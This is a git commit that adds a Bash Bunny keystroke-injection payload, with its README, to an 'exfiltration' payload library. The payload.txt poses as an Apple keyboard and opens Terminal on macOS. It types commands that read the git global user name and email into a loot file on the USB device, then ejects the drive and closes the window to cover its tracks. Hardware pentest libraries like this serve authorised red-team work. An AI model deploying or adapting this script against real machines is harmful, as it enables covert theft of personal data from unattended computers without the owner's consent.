Add github information exfiltration payload

payloads/library/exfiltration/githubExfiltration/README.md

@@ -0,0 +1,30 @@
+<div align="center">
+
+# Github Information Exfiltration
+**Get Git user name and email from the Git global config and exfiltrate them**
+
+![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
+![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
+
+![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
+
+</div>
+
+<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
+
+# Dependency
+
+* OSX Extension by quentin_lamamy
+
+# Changelog
+v1.0 : 
+* :tada: Release on 2023/08/20
+
+# Contributing
+A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
+
+# License
+<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
+
+# Support
+<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>

payloads/library/exfiltration/githubExfiltration/payload.txt

@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title:         OSX Payload to exfiltrate Git user name and email
+# Description:   Get Git user name and email from the Git global config and exfiltrate them
+# Author:        quentin_lamamy <contact@quentin-lamamy.fr>
+# Version:       1.0
+# Category:      Exfiltration
+# Attackmodes:   HID STORAGE
+# Target OS:     OSX
+# Dependency:    OSX Extensions
+#
+# Magenta solid           Setup
+# Yellow single blink     Attack in progress
+# Yellow double blink     Sync
+# Yellow triple blink     Cleanup
+# Green blink then solid  Finished
+
+LED SETUP
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
+
+OSX TERMINAL OPEN
+
+Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
+Q ENTER
+Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
+Q ENTER
+Q STRING 'touch $lootPath'
+Q ENTER
+
+LED ATTACK
+
+# Get the user name from the Git global config
+Q STRING 'user_name=$(git config --global user.name)'
+Q ENTER
+
+# Get the user email from the Git global config
+Q STRING 'user_email=$(git config --global user.email)'
+Q ENTER
+
+Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
+Q ENTER
+
+# Sync
+LED STAGE 2
+sync
+
+# Cleanup
+LED STAGE 3
+
+# Eject
+QUACK STRING 'diskutil eject $last_mounted_volume'
+QUACK ENTER
+DELAY 100
+
+OSX TERMINAL CLOSE
+
+LED FINISH